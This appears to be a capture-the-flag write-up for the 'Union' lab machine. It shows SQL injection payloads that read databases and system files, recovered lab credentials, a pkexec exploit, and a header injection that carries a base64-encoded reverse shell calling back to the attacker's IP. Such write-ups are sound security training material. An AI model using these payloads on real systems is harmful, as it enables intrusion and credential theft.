Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.128 | TCP:80 |
$ ip='10.10.11.128'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SQLI
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图](https://img.4awl.net/img/50/0983bcf4158967cf73bfa24da270ba.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图")
player=' union select 9;--+-
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图1](https://img.4awl.net/img/c7/233aa9b39681462d073fe210af96f3.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图1")
player=' union select group_concat(schema_name) from information_schema.schemata;--+-
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图2](https://img.4awl.net/img/95/bef0fb87801a432d3ad69a4b0108ea.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图2")
player=' union select group_concat(table_name) from information_schema.columns where table_schema='november';--+-
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图3](https://img.4awl.net/img/ec/d5b9336e81a2b1db7043cf1760aa0b.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图3")
player=' union select group_concat(one) from november.flag;--+-
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图4](https://img.4awl.net/img/ae/6677a59524258b7b7f12509fa7c278.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图4")
UHC{F1rst_5tep_2_Qualify}
http://10.10.11.128/challenge.php
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图5](https://img.4awl.net/img/8a/73df4182127440adb19ce40ff0eaf6.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图5")
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图6](https://img.4awl.net/img/80/7aca77e5312d1c0706343c26162432.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图6")
player=' union select group_concat(player) from november.players;--+-
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图7](https://img.4awl.net/img/fc/1a75f94d7ef8bb6db5c89efe07c53d.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图7")
ippsec,celesian,big0us,luska,tinyboy
player=' union select load_file('/etc/passwd');--+-
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图8](https://img.4awl.net/img/9e/0d7795ac76d684e8fa2aa466d18e74.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图8")
player=' union select load_file('/var/www/html/index.php');--+-
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图9](https://img.4awl.net/img/c3/0fc8866632cd2ec017635fa3afadf9.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图9")
player=' union select load_file('/var/www/html/config.php');--+-
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图10](https://img.4awl.net/img/c9/5fe5aadc8d415d4a8ce2205dcf8a71.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图10")
username:uhc
password:uhc-11qual-global-pw
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图11](https://img.4awl.net/img/d4/12fca029c990d4d30b95e14e4f0285.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图11")
User.txt
1618310a48daa65a153e7ca160f99720
TRP00F
https://github.com/MartinxMax/trp00f
$ python3 trp00f.py --lhost 10.10.16.33 --lport 10000 --rhost 10.10.16.33 --rport 10032 --http 9999
[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图12](https://img.4awl.net/img/60/cad9651750e1e94bf5b32aa87537e0.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图12")
Privilege Escalation:Command Injection && sudo
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图13](https://img.4awl.net/img/c4/fa2f2c81aec2366ae20d56a3b197c6.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图13")
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图14](https://img.4awl.net/img/f7/c27bc31d31d64fdf02a2f6279a8df8.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图14")
$ curl -X GET "http://10.10.11.128/firewall.php" \
-H "Host: 10.10.11.128" \
-H "Cache-Control: max-age=0" \
-H "Upgrade-Insecure-Requests: 1" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36" \
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" \
-H "Referer: http://10.10.11.128/challenge.php" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Cookie: PHPSESSID=34m0q9j1uck8sv7cbstv0vpu6p" \
-H "Connection: close" \
-H "X-Forwarded-For: 1.1.1.1;echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjMzLzQ0MyAwPiYx|base64 -d |bash;"
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图15](https://img.4awl.net/img/42/579cd8e36fc424af504378a55c52be.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图15")
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图16](https://img.4awl.net/img/e8/97d4077aa636db50ab6401e10e3c38.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图16")
$ sudo su
![[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图17](https://img.4awl.net/img/c5/db4228a72966cb638fd784d2ae018a.jpg "[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升插图17")
Root.txt
c6c82ef44b36fad95d3711546e31d86a
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
